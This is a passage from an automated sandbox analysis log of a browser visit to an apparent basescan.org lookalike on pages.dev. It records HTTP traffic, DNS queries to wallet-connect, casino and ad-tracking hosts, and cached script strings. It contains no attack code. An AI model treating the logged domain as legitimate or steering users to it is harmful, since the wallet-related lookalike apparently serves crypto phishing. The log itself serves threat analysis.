            Source: global trafficHTTP traffic detected: GET /game/image/93329c6f8b.png?_v=4&auto=format&dpr=1&w=200 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /game/image/d761cd69ed.jpg?_v=4&auto=format&dpr=1&w=200 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /game/image/6cc52a28-40fc-4a5b-8169-66fd31642b72.png?_v=4&auto=format&dpr=1&w=200 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /game/image/56c15419-5ce2-43a8-9700-23accc7661d0.png?_v=4&auto=format&dpr=1&w=200 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /game/image/e77c37b458.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100 HTTP/1.1Host: bc.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/style.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: chromecache_350.2.dr, chromecache_578.2.dr, chromecache_588.2.dr, chromecache_737.2.drString found in binary or memory: Math.round(q);v["gtm.videoElapsedTime"]=Math.round(f);v["gtm.videoPercent"]=r;v["gtm.videoVisible"]=t;return v},Yj:function(){e=zb()},nd:function(){d()}}};var gc=ja(["data-gtm-yt-inspected-"]),FC=["www.youtube.com","www.youtube-nocookie.com"],GC,HC=!1; equals www.youtube.com (Youtube)
            Source: chromecache_350.2.dr, chromecache_578.2.drString found in binary or memory: c?"runIfCanceled":"runIfUncanceled",[]);if(!g.length)return!0;var k=lA(a,c,e);N(121);if(k["gtm.elementUrl"]==="https://www.facebook.com/tr/")return N(122),!0;if(d&&f){for(var m=Kb(b,g.length),n=0;n<g.length;++n)g[n](k,m);return m.done}for(var p=0;p<g.length;++p)g[p](k,function(){});return!0},oA=function(){var a=[],b=function(c){return ob(a,function(d){return d.form===c})};return{store:function(c,d){var e=b(c);e?e.button=d:a.push({form:c,button:d})},get:function(c){var d=b(c);return d?d.button:null}}}, equals www.facebook.com (Facebook)
            Source: chromecache_350.2.dr, chromecache_578.2.dr, chromecache_588.2.dr, chromecache_737.2.drString found in binary or memory: if(!(e||f||g||k.length||m.length))return;var p={eh:e,ah:f,bh:g,Ph:k,Qh:m,Ge:n,Bb:b},q=C.YT;if(q)return q.ready&&q.ready(d),b;var r=C.onYouTubeIframeAPIReady;C.onYouTubeIframeAPIReady=function(){r&&r();d()};F(function(){for(var t=E.getElementsByTagName("script"),u=t.length,v=0;v<u;v++){var w=t[v].getAttribute("src");if(QC(w,"iframe_api")||QC(w,"player_api"))return b}for(var x=E.getElementsByTagName("iframe"),y=x.length,A=0;A<y;A++)if(!HC&&OC(x[A],p.Ge))return wc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
            Source: chromecache_277.2.dr, chromecache_840.2.drString found in binary or memory: import{ab as m,c as t,ac as f,Q as b,p as _,C as i,l as g,s as u,i as l,t as n,B as v,ad as w,ae as k,a9 as y,f as p,G as B,r as A}from"./index-DD2Zk4iT.js";import{showBlock as Z}from"./Block-LQQkMNS-.js";import{t as S,a as C,b as G,c as P,i as E,d as O,e as I}from"./discord-3fjpJq_P.js";var Q=p('<div class="w-full flex-col center"><div class="mt-4 rounded-full border-solid border-brand font-extrabold center size-12 border-4">18+</div><div class="mt-2 text-lg font-extrabold"></div><p class="mt-4 text-center"></p><span class="mt-4 cursor-pointer mb-6">'),x=p("<img alt=logo class=h-8>");const U=function(){f.pause();const o=b(()=>_.assets(`/logo/logo${i.darken?".png":"_w.png"}`)),e=()=>{m.pop(),f.start(),localStorage.setItem("isOlder18","older")};return t(w,{close:!1,type:"center",class:"w-full sm:w-[480px]",get title(){return(()=>{var r=x();return g(()=>u(r,"src",o())),r})()},get children(){var r=Q(),d=r.firstChild,a=d.nextSibling,c=a.nextSibling,s=c.nextSibling;return l(a,()=>n("Are you 18 or older?")),l(c,()=>n("You need to be aged 18 or older to use our website. Please confirm your age by clicking below.")),l(r,t(v,{type:"brand",onClick:e,class:"w-full mt-6",get children(){return n("I am 18 years or older")}}),s),s.$$click=()=>{m.push(()=>t(T,{}))},l(s,()=>n("I am under 18")),r}})},T=function(){const o=b(()=>_.assets(`/logo/logo${i.darken?".png":"_w.png"}`));return t(w,{class:"w-full pb-4 sm:w-[480px]",type:"center",close:!1,get title(){return(()=>{var e=x();return g(()=>u(e,"src",o())),e})()},get children(){return t(k,{type:"ban",get children(){return n("Sorry, we cannot provide services to users under the age of 18.")}})}})};function K(){return m.push(()=>t(U,{}),{close:!1})}y(["click"]);const q="/assets/gb-B2beghI0.png",z="/assets/gb_w-Ccj2A7G8.png";var H=p('<div class="w-full flex-col center"><p class="text-center text-lg font-extrabold"></p><img alt=gb-img class="mt-4 w-full"><p class="text-center text-secondary mt-3"></p><div class="mt-4 w-full center gap-2">'),M=p("<img alt=logo class=h-8>"),N=p('<img alt="">');const V=[{url:"https://twitter.com/BCGameOfficial",icon:S,iconw:C},{url:"https://t.me/bcgamewin",icon:G},{url:"https://t.me/bcgameofficial",icon:P},{url:"https://www.instagram.com/bcgame/",icon:E,iconw:O},{url:"https://discord.com/invite/xqUMQesZQq",icon:I}],j=function(){f.pause();const o=b(()=>_.assets(`/logo/logo${i.darken?".png":"_w.png"}`));return t(w,{close:!1,type:"center",class:"w-full sm:w-[480px]",get title(){return(()=>{var e=M();return g(()=>u(e,"src",o())),e})()},get children(){var e=H(),r=e.firstChild,d=r.nextSibling,a=d.nextSibling,c=a.nextSibling;return l(r,()=>n("Sorry, __ENV_HOST__ isn equals www.twitter.com (Twitter)
            Source: chromecache_826.2.dr, chromecache_392.2.drString found in binary or memory: return b}DC.H="internal.enableAutoEventOnTimer";var gc=ja(["data-gtm-yt-inspected-"]),FC=["www.youtube.com","www.youtube-nocookie.com"],GC,HC=!1; equals www.youtube.com (Youtube)
            Source: chromecache_432.2.dr, chromecache_477.2.drString found in binary or memory: tpl:'<div class="fancybox-share"><h1>{{SHARE}}</h1><p><a class="fancybox-share__button fancybox-share__button--fb" href="https://www.facebook.com/sharer/sharer.php?u={{url}}"><svg viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path d="m287 456v-299c0-21 6-35 35-35h38v-63c-7-1-29-3-55-3-54 0-91 33-91 94v306m143-254h-205v72h196" /></svg><span>Facebook</span></a><a class="fancybox-share__button fancybox-share__button--tw" href="https://twitter.com/intent/tweet?url={{url}}&text={{descr}}"><svg viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path d="m456 133c-14 7-31 11-47 13 17-10 30-27 37-46-15 10-34 16-52 20-61-62-157-7-141 75-68-3-129-35-169-85-22 37-11 86 26 109-13 0-26-4-37-9 0 39 28 72 65 80-12 3-25 4-37 2 10 33 41 57 77 57-42 30-77 38-122 34 170 111 378-32 359-208 16-11 30-25 41-42z" /></svg><span>Twitter</span></a><a class="fancybox-share__button fancybox-share__button--pt" href="https://www.pinterest.com/pin/create/button/?url={{url}}&description={{descr}}&media={{media}}"><svg viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path d="m265 56c-109 0-164 78-164 144 0 39 15 74 47 87 5 2 10 0 12-5l4-19c2-6 1-8-3-13-9-11-15-25-15-45 0-58 43-110 113-110 62 0 96 38 96 88 0 67-30 122-73 122-24 0-42-19-36-44 6-29 20-60 20-81 0-19-10-35-31-35-25 0-44 26-44 60 0 21 7 36 7 36l-30 125c-8 37-1 83 0 87 0 3 4 4 5 2 2-3 32-39 42-75l16-64c8 16 31 29 56 29 74 0 124-67 124-157 0-69-58-132-146-132z" fill="#fff"/></svg><span>Pinterest</span></a></p><p><input class="fancybox-share__input" type="text" value="{{url_raw}}" onclick="select()" /></p></div>'}}),e(t).on("click","[data-fancybox-share]",function(){var t,o,i=e.fancybox.getInstance(),a=i.current||null;a&&("function"===e.type(a.opts.share.url)&&(t=a.opts.share.url.apply(a,[i,a])),o=a.opts.share.tpl.replace(/\{\{media\}\}/g,"image"===a.type?encodeURIComponent(a.src):"").replace(/\{\{url\}\}/g,encodeURIComponent(t)).replace(/\{\{url_raw\}\}/g,n(t)).replace(/\{\{descr\}\}/g,i.$caption?encodeURIComponent(i.$caption.text()):""),e.fancybox.open({src:i.translate(i,o),type:"html",opts:{touch:!1,animationEffect:!1,afterLoad:function(t,e){i.$refs.container.one("beforeClose.fb",function(){t.close(null,0)}),e.$content.find(".fancybox-share__button").click(function(){return window.open(this.href,"Share","width=550, height=450"),!1})},mobile:{autoFocus:!1}}}))})}(document,jQuery),function(t,e,n){"use strict";function o(){var e=t.location.hash.substr(1),n=e.split("-"),o=n.length>1&&/^\+?\d+$/.test(n[n.length-1])?parseInt(n.pop(-1),10)||1:1,i=n.join("-");return{hash:e,index:o<1?1:o,gallery:i}}function i(t){""!==t.gallery&&n("[data-fancybox='"+n.escapeSelector(t.gallery)+"']").eq(t.index-1).focus().trigger("click.fb-start")}function a(t){var e,n;return!!t&&(e=t.current?t.current.opts:t.opts,""!==(n=e.hash||(e.$orig?e.$orig.data("fancybox")||e.$orig.data("fancybox-trigger"):""))&&n)}n.escapeSelector||(n.escapeSelector=function(t){return(t+"").replace(/([\0-\x1f\x7f]|^-?\d)|^-$|[^\x80-\uFFFF\w-]/g,
            Source: chromecache_432.2.dr, chromecache_477.2.drString found in binary or memory: tpl:'<div class="fancybox-share"><h1>{{SHARE}}</h1><p><a class="fancybox-share__button fancybox-share__button--fb" href="https://www.facebook.com/sharer/sharer.php?u={{url}}"><svg viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path d="m287 456v-299c0-21 6-35 35-35h38v-63c-7-1-29-3-55-3-54 0-91 33-91 94v306m143-254h-205v72h196" /></svg><span>Facebook</span></a><a class="fancybox-share__button fancybox-share__button--tw" href="https://twitter.com/intent/tweet?url={{url}}&text={{descr}}"><svg viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path d="m456 133c-14 7-31 11-47 13 17-10 30-27 37-46-15 10-34 16-52 20-61-62-157-7-141 75-68-3-129-35-169-85-22 37-11 86 26 109-13 0-26-4-37-9 0 39 28 72 65 80-12 3-25 4-37 2 10 33 41 57 77 57-42 30-77 38-122 34 170 111 378-32 359-208 16-11 30-25 41-42z" /></svg><span>Twitter</span></a><a class="fancybox-share__button fancybox-share__button--pt" href="https://www.pinterest.com/pin/create/button/?url={{url}}&description={{descr}}&media={{media}}"><svg viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path d="m265 56c-109 0-164 78-164 144 0 39 15 74 47 87 5 2 10 0 12-5l4-19c2-6 1-8-3-13-9-11-15-25-15-45 0-58 43-110 113-110 62 0 96 38 96 88 0 67-30 122-73 122-24 0-42-19-36-44 6-29 20-60 20-81 0-19-10-35-31-35-25 0-44 26-44 60 0 21 7 36 7 36l-30 125c-8 37-1 83 0 87 0 3 4 4 5 2 2-3 32-39 42-75l16-64c8 16 31 29 56 29 74 0 124-67 124-157 0-69-58-132-146-132z" fill="#fff"/></svg><span>Pinterest</span></a></p><p><input class="fancybox-share__input" type="text" value="{{url_raw}}" onclick="select()" /></p></div>'}}),e(t).on("click","[data-fancybox-share]",function(){var t,o,i=e.fancybox.getInstance(),a=i.current||null;a&&("function"===e.type(a.opts.share.url)&&(t=a.opts.share.url.apply(a,[i,a])),o=a.opts.share.tpl.replace(/\{\{media\}\}/g,"image"===a.type?encodeURIComponent(a.src):"").replace(/\{\{url\}\}/g,encodeURIComponent(t)).replace(/\{\{url_raw\}\}/g,n(t)).replace(/\{\{descr\}\}/g,i.$caption?encodeURIComponent(i.$caption.text()):""),e.fancybox.open({src:i.translate(i,o),type:"html",opts:{touch:!1,animationEffect:!1,afterLoad:function(t,e){i.$refs.container.one("beforeClose.fb",function(){t.close(null,0)}),e.$content.find(".fancybox-share__button").click(function(){return window.open(this.href,"Share","width=550, height=450"),!1})},mobile:{autoFocus:!1}}}))})}(document,jQuery),function(t,e,n){"use strict";function o(){var e=t.location.hash.substr(1),n=e.split("-"),o=n.length>1&&/^\+?\d+$/.test(n[n.length-1])?parseInt(n.pop(-1),10)||1:1,i=n.join("-");return{hash:e,index:o<1?1:o,gallery:i}}function i(t){""!==t.gallery&&n("[data-fancybox='"+n.escapeSelector(t.gallery)+"']").eq(t.index-1).focus().trigger("click.fb-start")}function a(t){var e,n;return!!t&&(e=t.current?t.current.opts:t.opts,""!==(n=e.hash||(e.$orig?e.$orig.data("fancybox")||e.$orig.data("fancybox-trigger"):""))&&n)}n.escapeSelector||(n.escapeSelector=function(t){return(t+"").replace(/([\0-\x1f\x7f]|^-?\d)|^-$|[^\x80-\uFFFF\w-]/g,
            Source: chromecache_350.2.dr, chromecache_578.2.drString found in binary or memory: var SB=function(a,b,c,d,e){var f=Jz("fsl",c?"nv.mwt":"mwt",0),g;g=c?Jz("fsl","nv.ids",[]):Jz("fsl","ids",[]);if(!g.length)return!0;var k=Oz(a,"gtm.formSubmit",g),m=a.action;m&&m.tagName&&(m=a.cloneNode(!1).action);N(121);if(m==="https://www.facebook.com/tr/")return N(122),!0;k["gtm.elementUrl"]=m;k["gtm.formCanceled"]=c;a.getAttribute("name")!=null&&(k["gtm.interactedFormName"]=a.getAttribute("name"));e&&(k["gtm.formSubmitElement"]=e,k["gtm.formSubmitElementText"]=e.value);if(d&&f){if(!wy(k,yy(b, equals www.facebook.com (Facebook)
            Source: global trafficDNS traffic detected: DNS query: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
            Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
            Source: global trafficDNS traffic detected: DNS query: cdn.ethers.io
            Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: basescan.org
            Source: global trafficDNS traffic detected: DNS query: www.walletlink.org
            Source: global trafficDNS traffic detected: DNS query: api.web3modal.com
            Source: global trafficDNS traffic detected: DNS query: relay.walletconnect.com
            Source: global trafficDNS traffic detected: DNS query: eas.etherscan.com
            Source: global trafficDNS traffic detected: DNS query: api.hypelab.com
            Source: global trafficDNS traffic detected: DNS query: relay.walletconnect.org
            Source: global trafficDNS traffic detected: DNS query: d107ul3j3wrui0.cloudfront.net
            Source: global trafficDNS traffic detected: DNS query: b.ixncdn.com
            Source: global trafficDNS traffic detected: DNS query: a.ixncdn.com
            Source: global trafficDNS traffic detected: DNS query: c.ixncdn.com
            Source: global trafficDNS traffic detected: DNS query: goto.etherscan.com
            Source: global trafficDNS traffic detected: DNS query: bcgame.sk
            Source: global trafficDNS traffic detected: DNS query: socketv2.bcgame.sk
            Source: global trafficDNS traffic detected: DNS query: socket2v2.bcgame.sk
            Source: global trafficDNS traffic detected: DNS query: bc.imgix.net
            Source: global trafficDNS traffic detected: DNS query: collect.verify.lnearn.com
            Source: global trafficDNS traffic detected: DNS query: js.hcaptcha.com
            Source: global trafficDNS traffic detected: DNS query: newassets.hcaptcha.com
            Source: global trafficDNS traffic detected: DNS query: api.hcaptcha.com
            Source: global trafficDNS traffic detected: DNS query: adssistem.com
            Source: global trafficDNS traffic detected: DNS query: s2.adform.net
            Source: global trafficDNS traffic detected: DNS query: event.getblue.io
            Source: global trafficDNS traffic detected: DNS query: pubads.g.doubleclick.uk.net
            Source: global trafficDNS traffic detected: DNS query: scripts.prdredir.com
            Source: global trafficDNS traffic detected: DNS query: rtgio.co
            Source: global trafficDNS traffic detected: DNS query: js.sentry-cdn.com
            Source: global trafficDNS traffic detected: DNS query: scripts.mediamathrdrt.com
            Source: global trafficDNS traffic detected: DNS query: pixel-us.convertagain.net
            Source: global trafficDNS traffic detected: DNS query: my.rtmark.net
            Source: global trafficDNS traffic detected: DNS query: metrics.aimetric.net
            Source: global trafficDNS traffic detected: DNS query: tracking.aimetric.net
            Source: global trafficDNS traffic detected: DNS query: pixel.prdredir.com
            Source: global trafficDNS traffic detected: DNS query: widget.getblue.io
            Source: global trafficDNS traffic detected: DNS query: a1.adform.net
            Source: global trafficDNS traffic detected: DNS query: insights.rtgio.co
            Source: global trafficDNS traffic detected: DNS query: pixel.mediamathrdrt.com
            Source: global trafficDNS traffic detected: DNS query: ib.adnxs.com
            Source: global trafficDNS traffic detected: DNS query: cm.g.doubleclick.net
            Source: global trafficDNS traffic detected: DNS query: cms.getblue.io
            Source: unknownHTTP traffic detected: POST /report/v4?s=deHEn%2BV5q%2BOj8m%2FK%2Bs9P63e5aM%2BWZt7kb7%2BnUsOgU8qySCQj83V12WHgo%2FEaRv8%2BC7QaS5ObT53dnlYIFS3TxKvJc3c25tRY3WpYYjpE0c7Zgkq5Oz3lpghTVTDRMvZr4jJgw3MCYsDNTFtdUTgHzRvYEOaDfGVdAjK5KqJVuf5oviWaYkR0mQJ3oWsLyPPUzUXohvQq HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 508Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:16:06 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 9Connection: closeAccess-Control-Allow-Origin: *Cache-Control: public, max-age=300, s-maxage=300Server: cloudflareCF-RAY: 8c9fe2df7a4f43af-EWR
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:16:09 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 9Connection: closeAccess-Control-Allow-Origin: *Cache-Control: public, max-age=300, s-maxage=300Server: cloudflareCF-RAY: 8c9fe2f10ba643f2-EWR
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:16:09 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 9Connection: closeAccess-Control-Allow-Origin: *Cache-Control: public, max-age=300, s-maxage=300Server: cloudflareCF-RAY: 8c9fe2f10b5472c2-EWR
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:16:09 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 9Connection: closeAccess-Control-Allow-Origin: *Cache-Control: public, max-age=300, s-maxage=300Server: cloudflareCF-RAY: 8c9fe2f10dc07ce8-EWRalt-svc: h3=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:16:09 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 9Connection: closeAccess-Control-Allow-Origin: *Cache-Control: public, max-age=300, s-maxage=300access-control-allow-credentials: trueServer: cloudflareCF-RAY: 8c9fe2f10ee48c6f-EWR
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:16:09 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 9Connection: closeAccess-Control-Allow-Origin: *Cache-Control: public, max-age=300, s-maxage=300access-control-allow-credentials: trueServer: cloudflareCF-RAY: 8c9fe2f1181d0ce1-EWR
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:16:09 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 9Connection: closeAccess-Control-Allow-Origin: *Cache-Control: public, max-age=300, s-maxage=300access-control-allow-credentials: trueServer: cloudflareCF-RAY: 8c9fe2f11c020cb4-EWR
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:16:10 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 9Connection: closeAccess-Control-Allow-Origin: *Cache-Control: public, max-age=300, s-maxage=300Server: cloudflareCF-RAY: 8c9fe2f53d8b0ca0-EWR
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:16:10 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 9Connection: closeAccess-Control-Allow-Origin: *Cache-Control: public, max-age=300, s-maxage=300Server: cloudflareCF-RAY: 8c9fe2f53dd543f9-EWR
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:16:10 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 9Connection: closeAccess-Control-Allow-Origin: *Cache-Control: public, max-age=300, s-maxage=300Server: cloudflareCF-RAY: 8c9fe2f53fb043c4-EWR
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:16:10 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 9Connection: closeAccess-Control-Allow-Origin: *Cache-Control: public, max-age=300, s-maxage=300access-control-allow-credentials: trueServer: cloudflareCF-RAY: 8c9fe2f538ed4321-EWR
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:16:10 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 9Connection: closeAccess-Control-Allow-Origin: *Cache-Control: public, max-age=300, s-maxage=300access-control-allow-credentials: trueServer: cloudflareCF-RAY: 8c9fe2f53ea143bc-EWR
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:16:10 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 9Connection: closeAccess-Control-Allow-Origin: *Cache-Control: public, max-age=300, s-maxage=300Server: cloudflareCF-RAY: 8c9fe2f54af88c23-EWR
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:16:11 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 9Connection: closeAccess-Control-Allow-Origin: *Cache-Control: public, max-age=300, s-maxage=300access-control-allow-credentials: trueServer: cloudflareCF-RAY: 8c9fe2f98caa0cc8-EWR
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 28 Sep 2024 01:16:12 GMTContent-Type: text/html; charset=utf-8Content-Length: 140Connection: closeX-Powered-By: ExpressAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-Type,token,AuthorizationAccess-Control-Allow-Methods: GET,PUT,POST,DELETEAccess-Control-Allow-Credentials: trueContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniff
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundx-frame-options: SAMEORIGINx-xss-protection: 0x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonereferrer-policy: strict-origin-when-cross-origincontent-type: text/html; charset=utf-8cache-control: no-cachex-request-id: a5776468-7f41-4c74-b6af-13d0fc5b99f5x-runtime: 0.007623vary: Accept, Origincontent-length: 2442date: Sat, 28 Sep 2024 01:16:13 GMTserver: Fly/a06ddcf9d (2024-09-27)via: 1.1 fly.iofly-request-id: 01J8V369DV57AT6MFRHG0MW1D4-ewr
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 28 Sep 2024 01:16:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closex-frame-options: SAMEORIGINx-xss-protection: 0x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonereferrer-policy: strict-origin-when-cross-origincache-control: no-cachex-request-id: 5447903b-d949-41bf-a7b1-795cac6636b3x-runtime: 0.044240vary: Accept, Originvia: 1.1 fly.iofly-request-id: 01J8V36C387AJDVQBS4XXRMY7Q-lgaCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vIpGtIM42ywQJOiTbnnfFrxd%2FRpP8RwgzEdduSjdpRmKMWgi4zmxtk2YmicCWbghsWsdEF1BxMs535eYiAC3CvWQ3oLD5%2Bm7hR0auDpeHkWLjdbLurRwO%2FYib%2FYnP9mWjGs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Speculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8c9fe3208b414381-EWR
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 28 Sep 2024 01:16:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closex-frame-options: SAMEORIGINx-xss-protection: 0x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonereferrer-policy: strict-origin-when-cross-origincache-control: no-cachex-request-id: 43167a9d-c8ac-44e7-a12f-15238a861b6bx-runtime: 0.014924vary: Accept, Originvia: 1.1 fly.iofly-request-id: 01J8V36D9S667F7Z7N3EXFQR2M-lgaCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p3fOtDnDOqnLlFFjBxDhziDaTy9Ing0I%2FDpRkODudVaSfs7eHqaLyQaj9R4Zto8LAsV39WOeSAWOwuCDTGTtcQ6C6X6GKqDR0vV8r7Ic%2B%2FMK8QXoabp6443BWgWJiZABudA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Speculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8c9fe3284c5041e9-EWR
